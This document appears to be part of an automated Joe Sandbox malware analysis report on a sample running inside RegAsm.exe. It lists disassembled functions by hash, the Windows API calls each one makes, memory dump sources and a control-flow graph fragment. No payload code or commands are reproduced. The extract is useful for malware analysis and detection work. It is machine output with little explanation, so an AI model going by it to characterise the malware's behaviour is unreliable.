                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: <$InA>$}z{x$|7(
                                                                                                                                                                                                                • API String ID: 0-3008498783
                                                                                                                                                                                                                • Opcode ID: f2cecdcd3e361a2e014ab8c53f77bf8355bcc2adbde0a80359934737828f8ad6
                                                                                                                                                                                                                • Instruction ID: ba6db43fa6947fad4a234946ca23f5e0f67a27b0eedd178c8c14836eec61e73d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2cecdcd3e361a2e014ab8c53f77bf8355bcc2adbde0a80359934737828f8ad6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A432D331A083604FD315CF29D89036FBBE1EBD5314F19C92DD8A99B391DB7998068BC6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID: InA>$InA>$f$}z{x
                                                                                                                                                                                                                • API String ID: 2994545307-844105762
                                                                                                                                                                                                                • Opcode ID: 87b346039ef0ff58d2d297e6186d3740a28f91a0657207179ea152e36d4606d4
                                                                                                                                                                                                                • Instruction ID: 4c4d201456567d4c56ccc0aeffc3ce956cb08362b783be90ad7721609f75a985
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87b346039ef0ff58d2d297e6186d3740a28f91a0657207179ea152e36d4606d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B32D0756083419FD714CF29C890B2FBBE2ABC9314F189A2EE4968B391D778DC05CB56
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000001), ref: 00417640
                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000001), ref: 004177B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                • String ID: |}
                                                                                                                                                                                                                • API String ID: 621844428-3974572420
                                                                                                                                                                                                                • Opcode ID: e2968ba23e1fb9159bc81495b3c9d2b65627d20b62a74ea636a2c7995b96266b
                                                                                                                                                                                                                • Instruction ID: 8b9c484b879947a4d1af565195316180e6d0e27292e811ae7adbada8751f1822
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2968ba23e1fb9159bc81495b3c9d2b65627d20b62a74ea636a2c7995b96266b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62B11471608340DBC7249F28C8926ABB7F2FF91314F19492EF4958B3A1E738E945C796
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 00439086
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Memory64ReadVirtualWow64
                                                                                                                                                                                                                • String ID: }z{x
                                                                                                                                                                                                                • API String ID: 3357887247-1935807464
                                                                                                                                                                                                                • Opcode ID: 51343d7b43cf4d9c6f53f27d09aba3500c197e381df7a6820aff55c26c5db536
                                                                                                                                                                                                                • Instruction ID: d47dfee082f1a6cb48b5d777a32f372a99160bd2ad4a1b1b3f9c320a9d5a41b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51343d7b43cf4d9c6f53f27d09aba3500c197e381df7a6820aff55c26c5db536
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71415836604305ABDB24CF04DC84B6BB7B6EB8D700F14942EF99957241C775DC00DB96
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Memory64ReadVirtualWow64
                                                                                                                                                                                                                • String ID: ,$31p
                                                                                                                                                                                                                • API String ID: 3357887247-3672193133
                                                                                                                                                                                                                • Opcode ID: 6390f2fdd262e9f46377bdf7af16135336a0f363ded4eebb316976f3bb70af1e
                                                                                                                                                                                                                • Instruction ID: 0db7e3a9d10fbc96566f6a30befd23890478b61157418dd703e2a2833b2feb34
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6390f2fdd262e9f46377bdf7af16135336a0f363ded4eebb316976f3bb70af1e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2E1F2B1A08350ABD3009F25DC427AFBBE5EFC5314F14892EF8D497382D63999098B97
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID: InA>$}z{x
                                                                                                                                                                                                                • API String ID: 2994545307-3945942619
                                                                                                                                                                                                                • Opcode ID: fd91b41f8517ad846f729504e3dc611381c999492ec196f8123f0edf07fb5599
                                                                                                                                                                                                                • Instruction ID: 6a07bf609f58bb5fe5e5209b5a76e29dba01eb35f8b35c3385471842874dc2cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd91b41f8517ad846f729504e3dc611381c999492ec196f8123f0edf07fb5599
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E7126356083015FD724CE29C89173BB7E2EBC9710F28A53EE99597395D7B8DC018789
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,00000000,?,?,?,?,?,00000040), ref: 0043CE1F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Memory64ReadVirtualWow64
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3357887247-0
                                                                                                                                                                                                                • Opcode ID: b32f01d9f52621f1b2d55c900d3373b72ffd37a5ba1f7ab658a65a1f90a5e9cd
                                                                                                                                                                                                                • Instruction ID: 2961eb3449e9620dd6c4faa6d90811a1abffc03b5a4c17fce246a2b98ba6e4df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b32f01d9f52621f1b2d55c900d3373b72ffd37a5ba1f7ab658a65a1f90a5e9cd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 556147327047144BD714CA2DCC9172BB7A3EBC9320F29923DE9A56B3E1DA349C028794
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID: }z{x
                                                                                                                                                                                                                • API String ID: 2994545307-1935807464
                                                                                                                                                                                                                • Opcode ID: aa45980cbac1e231f6e8da8b68cef9a9cf92f57abf15a9337a6b543c2cf2846f
                                                                                                                                                                                                                • Instruction ID: c622ef9edb583b2cafb03bc8f4f9681344dbf6dda95fbb3d8b8406b624183eef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa45980cbac1e231f6e8da8b68cef9a9cf92f57abf15a9337a6b543c2cf2846f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F912530204B508FD7258F28D8A07B3BBE2EF92304F59499DC0D78B252D739A815C7AD
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(0043F08B,005C003F,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B62E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                • Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                                                                                                                                • Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID: }z{x
                                                                                                                                                                                                                • API String ID: 2994545307-1935807464
                                                                                                                                                                                                                • Opcode ID: 7989b024d2c3b9fdf2d6e896aa61e9d2001099f6112cdbacafbd7d081e94b363
                                                                                                                                                                                                                • Instruction ID: a1b4afff401769b8bc283542711eec1d6d79511bf8af7d4ccfdd19c03198b9c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7989b024d2c3b9fdf2d6e896aa61e9d2001099f6112cdbacafbd7d081e94b363
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 797159369053108BD7149A2DC88436BF7A2EB8A714F29E57EE8996B391CB34DC0197C6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                • Opcode ID: 1b48745ee9b29d4670508d75d6af05d28424f9ff617e2911ae8345f7b890af72
                                                                                                                                                                                                                • Instruction ID: 6da14dff6695a29b7a138f1b5872fd1f2216a7a8924e699d2d19755c0f6557e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b48745ee9b29d4670508d75d6af05d28424f9ff617e2911ae8345f7b890af72
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7931F0755183049BC714DF18C88176BFBF5EF89314F05A82EE9A547290E73899088BAA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                • Opcode ID: b6f234a0b522ea11eabac60d3ff064bbff935bb36c70d1fb48d6f706d1bc80fb
                                                                                                                                                                                                                • Instruction ID: 050cd24433f61f3763ad39defb1fc8a13c057351b8bc1ee48cf204f6d01fffd2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6f234a0b522ea11eabac60d3ff064bbff935bb36c70d1fb48d6f706d1bc80fb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77C15B727083204BD714CF28E8923ABBBD2EBD1304F59853EE8968B381D63DDD058799
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 6461e9910320006a2e0836e55b9623e1c16260eee26792255f72b859ace59332
                                                                                                                                                                                                                • Instruction ID: 58a69b57af7e24ee3c62efa82a7d8eee2b8501685cdd5d883de90afc41c95a7c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6461e9910320006a2e0836e55b9623e1c16260eee26792255f72b859ace59332
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 728126326083109BE728CF14C85176BB7E2EFC5314F19852EEA9647391DB79DC158B8A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                • Opcode ID: 8e0a6a076834877b40c9be7990687a0251f09cf916669bfc8046d1d2174da018
                                                                                                                                                                                                                • Instruction ID: 448ffca5d87b80d32822c8b64973462d570a6b027f83770f115344b2745d6aa8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e0a6a076834877b40c9be7990687a0251f09cf916669bfc8046d1d2174da018
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6813976A183055BD714AF18C85073BB3E2FFC9350F09A43EE8858B351EB38E915979A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                • Opcode ID: 57e6c0a788ac01376f2d27b22cbd0b537e628117152a91b9aa99e78e6868a310
                                                                                                                                                                                                                • Instruction ID: 767567ce47251ea28a1813ea366a1b038ceed0e869b8d918d7d8446cf86f5ca2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57e6c0a788ac01376f2d27b22cbd0b537e628117152a91b9aa99e78e6868a310
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D517C766083015BD7148B28C85473BF7A1EBDA754F29A47EF4C66B382EA34DC01879A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 4aeb0bebc72e8b8a55697ddec9a848093945708c80ef1decd1f7b9832504b335
                                                                                                                                                                                                                • Instruction ID: 6a3c87ed268c674eb99f3637c0156bf68a3d7e0a263c8b87bddcd13a1fbb2be6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4aeb0bebc72e8b8a55697ddec9a848093945708c80ef1decd1f7b9832504b335
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB312A75A08604EFD704DF28DC45BAB77E8EB8A354F14493DF849C7281E238D94587AA

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000001), ref: 00411317
                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000003), ref: 00411337
                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000001), ref: 00411357
                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000001), ref: 00411377
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                • String ID: Z
                                                                                                                                                                                                                • API String ID: 621844428-1505515367
                                                                                                                                                                                                                • Opcode ID: 7db3afaa4306f1bcee78401605168040110c24e84f1d1c2a3248a5ab23f704a2
                                                                                                                                                                                                                • Instruction ID: 7ac7095e787f66665aa3dcbb55ee2acb77b64e2a3ff96d475d68631c8037dee2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7db3afaa4306f1bcee78401605168040110c24e84f1d1c2a3248a5ab23f704a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4531F5B0A5979047F711A721A822BEF77D4AF92358F04093DE589A3283DB3D5509829F

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1073 40d400-40d408 call 43a040 1076 40d478-40d47a ExitProcess 1073->1076 1077 40d40a-40d411 call 432aa0 1073->1077 1080 40d473 call 43b530 1077->1080 1081 40d413-40d41f 1077->1081 1080->1076 1083 40d420-40d448 1081->1083 1083->1083 1084 40d44a-40d458 GetCurrentThreadId GetForegroundWindow 1083->1084 1085 40d460-40d467 call 40e490 1084->1085 1086 40d45a GetCurrentProcessId 1084->1086 1085->1080 1089 40d469 call 410bd0 1085->1089 1086->1085 1091 40d46e call 40fb90 1089->1091 1091->1080
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3118123366-0
                                                                                                                                                                                                                • Opcode ID: 17cc16c0ba72b8ddc0396a5f799a5ad826925f4b051eeba5302ac1a7e6bb8a34
                                                                                                                                                                                                                • Instruction ID: a18b284b2e66d058522ee5bde7d4ca9708ea0d3b90004192466f8b4187448e12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17cc16c0ba72b8ddc0396a5f799a5ad826925f4b051eeba5302ac1a7e6bb8a34
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F0F07090820047D7147FB2981E72E7B51AF52B8EF00447EA5C6BB2D7DE3D94058A2E
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                • String ID: m>hF
                                                                                                                                                                                                                • API String ID: 3890896728-898274283
                                                                                                                                                                                                                • Opcode ID: 9e17cb7cebdc63ed7f94fa66740fca5ac92760bc485fdd5c13d8e1f27dedcdea
                                                                                                                                                                                                                • Instruction ID: 61c423f2da36b7ac1fa402b5061fcb009773d313ebc379a7c9e230c2ac7043c6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e17cb7cebdc63ed7f94fa66740fca5ac92760bc485fdd5c13d8e1f27dedcdea
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88F074B45087019FE354DF29D5A871ABBF0FB84304F00891CE5D99B3A0DBB5AA49CF86
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0043C3CE
                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0043C3DD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ForegroundWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2020703349-0
                                                                                                                                                                                                                • Opcode ID: 65e3a1b7659f90bbfb522b749dff0ded02fbb0bb1f6bff72cd7de80a9b647f8f
                                                                                                                                                                                                                • Instruction ID: 3d74f6937b0da6f9bb753501b6533d13d5f28c94efa54478c9cbf2e46fb409f1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65e3a1b7659f90bbfb522b749dff0ded02fbb0bb1f6bff72cd7de80a9b647f8f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81D0A9BA5120009BA209EB22BC0A84F3216AF8AA0F7244479E40702296EF265602C78F
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000), ref: 0043831E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                • Opcode ID: 30165f6662e71da6cf67b059ec6711a0b1a5ea863487de7cbfa1e172c87ef5b4
                                                                                                                                                                                                                • Instruction ID: f83ec565af989f546f89ac4021099bd9b02803395ba86297f2ea752137e99ac7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30165f6662e71da6cf67b059ec6711a0b1a5ea863487de7cbfa1e172c87ef5b4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0117A37E066108BD31CCB28CC9166AB713EBC1315F2DC27DC952977A8CE350C0186C4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,00000000), ref: 0043B5CB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                • Opcode ID: 6819beeecc388cd5d2934476fbb51b062ddfc78142f39ed6c36330f4b67dcea6
                                                                                                                                                                                                                • Instruction ID: 74823947c3c425b37561a34d9b8d2efd2942ac18d914846c4d006f22053594ee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6819beeecc388cd5d2934476fbb51b062ddfc78142f39ed6c36330f4b67dcea6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51012871A152019BD304AF75EC5561BB7A6EFCA305F08843DE9C446211E739C8469696
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                • Opcode ID: d84a3cc36e79e2c4c7bc0645f49e781a8ea4556c57b39dbc4e76dab9bc9fa6fc
                                                                                                                                                                                                                • Instruction ID: 18e0713c30ec81aa62a71d0ecc001b21a065892b9bc9aeccd5b104f9934267ec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d84a3cc36e79e2c4c7bc0645f49e781a8ea4556c57b39dbc4e76dab9bc9fa6fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDF07AB450C341CFE754DF28C5A871BBBE0BB89314F10891CE5998B390C7B59549CF82
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 00410BE3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                • Opcode ID: e7474e31947500fa4415328581472b616a3b11b002a1a73309fa97bbe2141a31
                                                                                                                                                                                                                • Instruction ID: b4532f2fe372d2cb61c90b12c54696faac8a3f2e77a6efe18e9fc46a379e6e33
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7474e31947500fa4415328581472b616a3b11b002a1a73309fa97bbe2141a31
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9D09720A948002BD208AB3CEC0AF223A5CEB43726F400238FA938A1C3EC802910C178
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410C17
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeSecurity
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 640775948-0
                                                                                                                                                                                                                • Opcode ID: b1555e55e99654be8936181e32e02c6337ee16ac9d16533d8328badfa98fe05d
                                                                                                                                                                                                                • Instruction ID: f1029602b035823865252b0fa187f8e0862bec21c64ceb27c466c7e5c6614e77
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1555e55e99654be8936181e32e02c6337ee16ac9d16533d8328badfa98fe05d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54D0C9343E47417BF9248B08AC13F143250670AF1AF700765B322FE2E6C9D071218A0D
                                                                                                                                                                                                                APIs
